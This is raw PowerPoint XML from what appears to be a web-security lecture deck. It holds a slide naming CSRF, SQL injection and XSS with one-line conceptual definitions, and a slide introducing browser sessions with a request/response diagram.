              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB6BBBFF-598E-E54B-9ACF-E8EA5A7A31BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9890735" y="3495652"/>
            <a:ext cx="539280" cy="540360"/>
            <a:chOff x="9890735" y="3495652"/>
            <a:chExt cx="539280" cy="54036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1A33691-0D23-1341-8500-88C17DCF8BD8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10076495" y="3506092"/>
                <a:ext cx="232200" cy="529920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="2" name="Ink 1">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1A33691-0D23-1341-8500-88C17DCF8BD8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10013855" y="3443452"/>
                  <a:ext cx="35784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8C2AE0F-3163-9247-9D57-FED61FB17232}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9890735" y="3506092"/>
                <a:ext cx="111600" cy="247680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Ink 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8C2AE0F-3163-9247-9D57-FED61FB17232}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9828095" y="3443092"/>
                  <a:ext cx="2372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D2FFA4F-0AD1-EE48-89E3-F20500671AFE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10039775" y="3495652"/>
                <a:ext cx="390240" cy="45000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="5" name="Ink 4">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D2FFA4F-0AD1-EE48-89E3-F20500671AFE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9976775" y="3432652"/>
                  <a:ext cx="515880" cy="170640"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392378554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2BDCCC5C-08EB-8444-839D-A6C18ED2361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Top Web Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFC451B9-BBE2-EE4D-8F89-F98C940B1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865" y="1772539"/>
            <a:ext cx="6408220" cy="44428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2A04A08-7BB8-3341-8A45-8F6AE5905067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596088" y="4397531"/>
            <a:ext cx="5256072" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>XSRF (CSRF) - cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>bad website forces the user’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>s browser to send a request to a good website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34AC5CA4-C192-F24D-BD73-63636301AF87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6120265" y="5199743"/>
            <a:ext cx="5133597" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Malicious data sent to a website is interpreted as code in a query to the website’s back-end database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B3A999-505C-B145-9A34-D092936425ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6625883" y="1328394"/>
            <a:ext cx="5133597" cy="1292662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>XSS (CSS) – cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Malicious code injected into a trusted context (e.g., malicious data presented by a trusted website interpreted as code by the user’s browser)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="882060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8F9EBB97-3968-044C-B844-A24E6E305FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769497" y="962715"/>
            <a:ext cx="4437991" cy="3276318"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624310FE-A614-B043-94B1-00E452AD746C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1621970" y="2347783"/>
            <a:ext cx="1905000" cy="1103312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16390" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5252C2A3-4FB2-0D46-94FA-F17027B9824C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3526971" y="2527170"/>
            <a:ext cx="4314825" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2718"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2718"/>
              <a:gd name="T13" fmla="*/ 0 h 253"/>
              <a:gd name="T14" fmla="*/ 2718 w 2718"/>
              <a:gd name="T15" fmla="*/ 253 h 253"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="2718" h="253">
                <a:moveTo>
                  <a:pt x="0" y="216"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="216"/>
                  <a:pt x="146" y="253"/>
                  <a:pt x="408" y="217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="670" y="181"/>
                  <a:pt x="1187" y="2"/>
                  <a:pt x="1572" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1957" y="0"/>
                  <a:pt x="2479" y="167"/>
                  <a:pt x="2718" y="211"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>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91" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A08260A-9FFE-784C-ABB2-E0EE4C9EABED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7829096" y="2784346"/>
            <a:ext cx="365125" cy="3651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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16394" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A64ED3-DD56-FB4E-AE84-C71A0B5D5A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7613196" y="2368421"/>
            <a:ext cx="1095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a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16395" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{909D8D88-4A65-C741-A507-767A33812AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3526970" y="2828796"/>
            <a:ext cx="4305300" cy="455613"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2712"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2712"/>
              <a:gd name="T13" fmla="*/ 0 h 287"/>
              <a:gd name="T14" fmla="*/ 2712 w 2712"/>
              <a:gd name="T15" fmla="*/ 287 h 287"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="2712" h="287">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="244"/>
                  <a:pt x="161" y="287"/>
                  <a:pt x="408" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="655" y="211"/>
                  <a:pt x="1098" y="30"/>
                  <a:pt x="1482" y="15"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1866" y="0"/>
                  <a:pt x="2456" y="129"/>
                  <a:pt x="2712" y="159"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="lg" len="lg"/>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96" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A45613-34A7-6646-BAAE-9B343E16E6BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4161970" y="2271584"/>
            <a:ext cx="1022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a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16397" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC4ED96F-F240-B944-82EF-DBCBA7330881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4225628" y="3114545"/>
            <a:ext cx="11544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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D281728A-C6D7-7246-88EE-C2118FCC53CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sessions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{898AE998-0FD6-894E-9E74-A4EAE9F9AE4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8787493" y="3679695"/>
            <a:ext cx="365125" cy="3651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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FD3EBFC-F45B-8B4D-B703-20E21ACAA7AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8982982" y="1331610"/>
            <a:ext cx="365125" cy="3651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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92FB850-1D99-C14A-85DA-4E7B1442CE84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9902146" y="2298118"/>
            <a:ext cx="365125" cy="3651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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4BD61E6-F4E0-DA43-950B-C61B82FEAA30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="984512" y="3990537"/>
            <a:ext cx="10633039" cy="1808187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Session = a sequence of requests and responses </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from one browser to one or more sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Can be long or short (Gmail – several weeks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Without session management, users would have to constantly re-authenticate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF14D66A-3767-C341-9CB1-CB3DC3CA20F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2505071" y="5895285"/>
            <a:ext cx="7718780" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
